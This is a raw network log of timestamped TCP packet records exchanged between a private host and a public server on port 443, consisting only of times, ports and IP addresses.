Jan 1, 2025 08:31:31.549463034 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.549508095 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.549515963 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.549547911 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.555680990 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.555727959 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.555767059 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.555810928 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.585376024 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.585422039 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.585422993 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.585432053 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.585478067 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.593493938 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.593537092 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.593544006 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.593549967 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.593590975 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.593590975 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.609266996 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.609318018 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.609359980 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.609414101 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.616652012 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.616699934 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.616738081 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.616786003 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.622699022 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.622750998 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.622756958 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.622764111 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.622819901 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.627942085 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.627990007 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.628047943 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.628098011 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.628537893 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.628587008 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.628597021 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.628624916 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.628638029 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.628643036 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.628654957 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.628678083 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.628698111 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.628748894 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.629556894 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.629622936 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.629681110 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.629725933 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.630369902 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.630409002 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.630413055 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.630419016 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.630439997 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.630448103 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.630460024 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.630464077 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.630492926 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.630517006 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.630558014 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.630603075 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.630624056 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.630671024 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.630729914 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.630775928 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.631429911 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.631467104 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.631479025 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.631484032 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.631510973 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.631524086 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.631875992 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.631918907 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.631927013 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.631932020 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.631958008 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.631968975 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.636281013 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.636322975 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.636341095 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.636346102 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.638947010 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.638947010 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.642493963 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.642529964 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.642551899 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.642558098 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.642581940 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.642596006 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.662911892 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.672305107 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.672352076 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.672365904 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.672372103 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.672420979 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.680335045 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.680401087 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.680458069 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.680505991 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.696227074 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.696276903 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.696290970 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.696295977 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.696322918 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.696336985 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.703630924 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.703679085 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.703823090 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.703830004 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.703880072 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.709597111 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.710513115 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.710566044 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.710689068 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.710745096 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.715945959 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.715981007 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.716005087 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.716012001 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.716039896 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.716062069 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.716291904 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.716339111 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.716459036 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.716512918 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.716600895 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.716639996 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.716643095 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.716649055 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.716695070 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.717561007 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.717605114 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.717715979 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.717772007 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.718655109 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.718689919 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.718729019 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.718729019 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.718735933 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.718776941 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.718842983 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.718893051 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.719007015 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.719050884 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.719182968 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.719229937 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.719330072 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.719378948 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.719382048 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.719388962 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.719424963 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.719428062 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.719438076 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.719476938 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.719479084 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.719485998 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.719520092 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.719522953 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.719538927 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.719544888 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.719573975 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.719588995 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.723124981 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.723165989 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.723166943 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.723174095 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.723207951 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.730474949 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.730510950 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.730536938 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.730544090 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.730571032 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.730592012 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.746027946 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.759052038 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.759085894 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.759105921 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.759113073 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.759135962 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.759155989 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.767182112 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.767214060 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.767239094 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.767246008 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.767271996 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.767282009 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.783070087 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.783108950 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.783122063 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.783127069 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.783153057 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.783164978 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.790416956 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.790456057 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.790477991 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.790484905 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.790509939 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.790517092 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.796267033 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.796298981 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.796303034 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.796308994 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.796343088 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.801517010 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.801563978 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.801588058 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.801630020 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.801846027 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.801887035 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.801901102 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.801907063 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.801919937 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.801944017 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.802062988 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.802095890 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.802112103 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.802122116 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.802135944 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.802161932 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.803129911 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.803164005 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.803175926 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.803181887 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.803200006 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.803225994 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.803951979 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.803987980 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.803998947 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.804003954 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.804033995 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.804043055 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.804075956 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.804121017 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.804179907 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.804219961 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.804393053 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.804424047 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.804456949 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.804456949 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.804467916 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.804508924 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.804914951 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.804948092 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.804955006 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.804960012 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.804996967 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.805269003 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.805300951 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.805306911 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.805315971 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.805337906 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.805375099 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.809839964 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.809890985 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.809895039 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.809901953 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.809988022 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.816076994 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.816116095 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.816127062 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.816133022 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.816160917 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.816181898 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.819134951 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.847462893 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.847498894 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.847517967 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.847524881 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.847548008 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.847567081 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.853909969 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.853948116 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.853950024 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.853957891 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.853990078 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.870007038 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.870047092 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.870064020 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.870070934 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.870090008 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.870105982 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.877327919 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.877361059 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.877376080 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.877382994 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.877392054 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.877418041 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.882992029 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.883043051 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.883080006 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.883136988 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.888369083 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.888406992 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.888412952 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.888417959 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.888448954 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.888458967 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.888731956 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.888771057 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.888801098 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.888839960 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.888936996 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.888968945 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.888986111 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.888992071 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.889013052 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.889019012 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.889950037 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.889981031 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.889998913 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.890006065 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.890032053 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.890053034 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.890621901 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.890661955 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.890686035 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.890727997 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.890788078 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.890830994 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.890906096 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.890952110 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.890969038 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.891015053 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.891545057 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.891588926 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.891609907 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.891649008 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.892050982 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.892082930 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.892092943 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.892097950 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.892122984 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.892139912 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.896702051 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.896735907 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.896752119 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.896758080 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:31.896781921 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:31.896796942 CET	49987	443	192.168.2.4	118.178.60.9
